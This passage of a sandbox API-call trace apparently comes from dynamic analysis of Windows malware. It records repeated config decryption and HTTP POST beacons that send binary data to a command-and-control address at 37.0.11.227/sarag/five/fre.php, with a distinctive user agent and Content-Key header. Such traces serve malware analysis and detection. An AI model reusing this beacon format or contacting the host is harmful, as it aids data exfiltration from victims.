(HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6abd08 [0199.435] GetProcessHeap () returned 0x690000 [0199.436] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 [0199.438] send (s=0x42c, buf=0x6abd08*, len=242, flags=0) returned 242 [0199.438] send (s=0x42c, buf=0x6aba40*, len=159, flags=0) returned 159 [0199.438] GetProcessHeap () returned 0x690000 [0199.438] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0199.438] recv (in: s=0x42c, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0199.511] GetProcessHeap () returned 0x690000 [0199.511] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0199.512] GetProcessHeap () returned 0x690000 [0199.512] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0199.512] GetProcessHeap () returned 0x690000 [0199.513] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6afb00 | out: hHeap=0x690000) returned 1 [0199.513] GetProcessHeap () returned 0x690000 [0199.514] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af078 | out: hHeap=0x690000) returned 1 [0199.516] closesocket (s=0x42c) returned 0 [0199.517] GetProcessHeap () returned 0x690000 [0199.517] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab3a0 | out: hHeap=0x690000) returned 1 [0199.517] GetProcessHeap () returned 0x690000 [0199.518] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a9f58 | out: hHeap=0x690000) returned 1 [0199.518] GetProcessHeap () returned 0x690000 [0199.518] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0199.518] GetProcessHeap () returned 0x690000 [0199.518] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0199.519] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x127c) returned 0x42c [0199.522] Sleep (dwMilliseconds=0xea60) [0199.523] GetProcessHeap () returned 0x690000 [0199.523] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0199.524] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0199.526] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0199.538] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0199.538] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0199.544] GetProcessHeap () returned 0x690000 [0199.544] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a30 [0199.545] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0199.545] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a8a30, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0199.546] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0199.546] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0199.549] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0199.549] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0199.549] GetProcessHeap () returned 0x690000 [0199.550] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a30 | out: hHeap=0x690000) returned 1 [0199.550] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0199.551] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0199.551] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0199.551] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0199.562] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0199.562] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0199.562] GetProcessHeap () returned 0x690000 [0199.562] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6a9f58 [0199.563] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0199.563] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0199.564] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0199.564] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0199.565] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0199.565] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0199.565] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0199.566] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0199.566] GetProcessHeap () returned 0x690000 [0199.566] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f48 [0199.566] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0199.566] GetProcessHeap () returned 0x690000 [0199.567] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f48 | out: hHeap=0x690000) returned 1 [0199.567] GetProcessHeap () returned 0x690000 [0199.567] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a9f58 | out: hHeap=0x690000) returned 1 [0199.567] GetProcessHeap () returned 0x690000 [0199.568] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0199.569] GetProcessHeap () returned 0x690000 [0199.569] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0199.570] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0199.571] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0199.578] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0199.578] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aeff0) returned 1 [0199.583] GetProcessHeap () returned 0x690000 [0199.583] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a30 [0199.584] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0199.584] CryptImportKey (in: hProv=0x6aeff0, pbData=0x6a8a30, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0199.585] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0199.585] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0199.586] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0199.586] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0199.586] GetProcessHeap () returned 0x690000 [0199.586] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a30 | out: hHeap=0x690000) returned 1 [0199.587] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0199.587] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0199.588] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0199.588] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0199.589] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0199.589] CryptReleaseContext (hProv=0x6aeff0, dwFlags=0x0) returned 1 [0199.589] GetProcessHeap () returned 0x690000 [0199.589] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6a9f58 [0199.590] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0199.590] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0199.591] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0199.591] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0199.592] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0199.592] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0199.592] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0199.593] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0199.593] GetProcessHeap () returned 0x690000 [0199.593] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0199.593] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b2bf0*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aea18*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0199.593] GetProcessHeap () returned 0x690000 [0199.593] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab390 [0199.593] socket (af=2, type=1, protocol=6) returned 0x430 [0199.593] connect (s=0x430, name=0x6aea18*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0199.617] FreeAddrInfoW (pAddrInfo=0x6b2bf0*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aea18*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0199.617] GetProcessHeap () returned 0x690000 [0199.617] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aedd0 [0199.617] GetProcessHeap () returned 0x690000 [0199.617] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b2fb8 [0199.617] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0199.618] wvsprintfA (in: param_1=0x6b2fb8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0199.618] GetProcessHeap () returned 0x690000 [0199.618] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6af440 [0199.619] GetProcessHeap () returned 0x690000 [0199.619] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 [0199.620] GetProcessHeap () returned 0x690000 [0199.620] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4730 [0199.620] GetProcessHeap () returned 0x690000 [0199.620] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b2fb8 [0199.620] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0199.621] wvsprintfA (in: param_1=0x6b2fb8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0199.621] GetProcessHeap () returned 0x690000 [0199.621] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6abd08 [0199.621] GetProcessHeap () returned 0x690000 [0199.622] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 [0199.622] send (s=0x430, buf=0x6abd08*, len=242, flags=0) returned 242 [0199.623] send (s=0x430, buf=0x6aba40*, len=159, flags=0) returned 159 [0199.623] GetProcessHeap () returned 0x690000 [0199.623] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0199.623] recv (in: s=0x430, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0199.720] GetProcessHeap () returned 0x690000 [0199.720] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0199.721] GetProcessHeap () returned 0x690000 [0199.721] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0199.721] GetProcessHeap () returned 0x690000 [0199.722] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af440 | out: hHeap=0x690000) returned 1 [0199.722] GetProcessHeap () returned 0x690000 [0199.722] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aedd0 | out: hHeap=0x690000) returned 1 [0199.722] closesocket (s=0x430) returned 0 [0199.723] GetProcessHeap () returned 0x690000 [0199.723] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab390 | out: hHeap=0x690000) returned 1 [0199.723] GetProcessHeap () returned 0x690000 [0199.724] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a9f58 | out: hHeap=0x690000) returned 1 [0199.724] GetProcessHeap () returned 0x690000 [0199.724] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0199.724] GetProcessHeap () returned 0x690000 [0199.725] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0199.725] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1280) returned 0x430 [0199.730] Sleep (dwMilliseconds=0xea60) [0199.731] GetProcessHeap () returned 0x690000 [0199.731] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0199.732] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0199.733] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0199.742] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0199.742] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aee58) returned 1 [0199.749] GetProcessHeap () returned 0x690000 [0199.749] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8940 [0199.749] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0199.750] CryptImportKey (in: hProv=0x6aee58, pbData=0x6a8940, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0199.751] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0199.751] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0199.751] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0199.752] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0199.752] GetProcessHeap () returned 0x690000 [0199.752] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8940 | out: hHeap=0x690000) returned 1 [0199.753] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0199.753] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0199.761] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0199.762] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0199.762] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0199.762] CryptReleaseContext (hProv=0x6aee58, dwFlags=0x0) returned 1 [0199.762] GetProcessHeap () returned 0x690000 [0199.763] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6a9f58 [0199.763] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0199.763] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0199.764] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0199.764] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0199.765] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0199.765] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0199.766] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0199.767] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0199.767] GetProcessHeap () returned 0x690000 [0199.767] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0199.767] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0199.767] GetProcessHeap () returned 0x690000 [0199.768] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0199.768] GetProcessHeap () returned 0x690000 [0199.768] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a9f58 | out: hHeap=0x690000) returned 1 [0199.768] GetProcessHeap () returned 0x690000 [0199.769] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0199.769] GetProcessHeap () returned 0x690000 [0199.769] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0199.769] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0199.770] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0199.774] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0199.775] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0199.780] GetProcessHeap () returned 0x690000 [0199.780] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8940 [0199.781] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0199.781] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a8940, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0199.782] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0199.782] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0199.783] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0199.783] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0199.783] GetProcessHeap () returned 0x690000 [0199.783] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8940 | out: hHeap=0x690000) returned 1 [0199.784] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0199.785] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0199.785] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0199.786] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0199.786] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0199.787] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0199.787] GetProcessHeap () returned 0x690000 [0199.787] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6a9f58 [0199.788] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0199.788] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0199.789] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0199.789] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0199.790] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0199.790] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0199.791] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0199.791] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0199.791] GetProcessHeap () returned 0x690000 [0199.791] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0199.791] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b2998*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6ae850*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0199.791] GetProcessHeap () returned 0x690000 [0199.791] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab360 [0199.791] socket (af=2, type=1, protocol=6) returned 0x434 [0199.792] connect (s=0x434, name=0x6ae850*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0199.828] FreeAddrInfoW (pAddrInfo=0x6b2998*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6ae850*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0199.828] GetProcessHeap () returned 0x690000 [0199.828] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aecc0 [0199.828] GetProcessHeap () returned 0x690000 [0199.828] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b2fb8 [0199.828] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0199.829] wvsprintfA (in: param_1=0x6b2fb8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0199.829] GetProcessHeap () returned 0x690000 [0199.829] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6af980 [0199.829] GetProcessHeap () returned 0x690000 [0199.830] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 [0199.832] GetProcessHeap () returned 0x690000 [0199.832] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4730 [0199.832] GetProcessHeap () returned 0x690000 [0199.832] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b2fb8 [0199.832] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0199.833] wvsprintfA (in: param_1=0x6b2fb8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0199.833] GetProcessHeap () returned 0x690000 [0199.833] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6abd08 [0199.833] GetProcessHeap () returned 0x690000 [0199.834] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 [0199.834] send (s=0x434, buf=0x6abd08*, len=242, flags=0) returned 242 [0199.835] send (s=0x434, buf=0x6aba40*, len=159, flags=0) returned 159 [0199.835] GetProcessHeap () returned 0x690000 [0199.835] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0199.835] recv (in: s=0x434, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0199.919] GetProcessHeap () returned 0x690000 [0199.920] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0199.920] GetProcessHeap () returned 0x690000 [0199.920] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0199.920] GetProcessHeap () returned 0x690000 [0199.921] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af980 | out: hHeap=0x690000) returned 1 [0199.921] GetProcessHeap () returned 0x690000 [0199.921] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aecc0 | out: hHeap=0x690000) returned 1 [0199.921] closesocket (s=0x434) returned 0 